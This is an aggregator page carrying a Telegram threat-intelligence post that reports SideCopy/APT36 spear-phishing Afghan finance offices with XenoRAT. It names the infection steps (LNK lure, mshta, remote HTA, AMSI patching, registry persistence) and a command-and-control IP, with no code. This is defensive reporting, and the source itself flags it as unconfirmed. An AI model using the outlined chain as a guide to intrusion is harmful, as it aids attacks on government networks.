SIT Reports: 🔍 SideCopy Uses XenoRAT Against Afghan Finance Network SideCopy, linked to Transparent...

Fast Alert Sensor Tier 3 Fast-alert source Situation-report fast-alert perspective Fast situation reports can outrun confirmation and should be cross-checked source-attributed Telegram source claim Public Telegram post fast-alert sensor global conflict situation reports

Public Telegram broadcast channel promoted after bounded no-media handle validation on 2026-05-31.

40 views 1 forwards 0 reactions Top 92.59% in source Source rank #26 Global pct 3.89

Original English English

🔍 SideCopy Uses XenoRAT Against Afghan Finance Network

SideCopy, linked to Transparent Tribe/APT36, is assessed to have targeted Afghanistan’s Ministry of Finance and all 34 provincial revenue directorates with a spear-phishing chain delivering XenoRAT 1.8.7. The lure used a Pashto-named LNK inside a ZIP archive, then abused mshta.exe, remote HTA stages, reflective .NET loading, AMSI patching, and registry persistence. XenoRAT connected to 185.235.137.106 via AES-encrypted TCP traffic.

The operation stands out for target-specific decoy material listing provincial finance staff and direct numbers, indicating prior collection before delivery. TTPs remain consistent with long-observed SideCopy tradecraft, while the use of government-adjacent Afghan infrastructure and bulletproof hosting shows a layered setup for access, persistence, and command-and-control.

🛰️ Open sources - closed narratives
@sitreports

Telegram media item Media served by Telegram. The preview loads from telegram.org when this card is visible. Open original Telegram post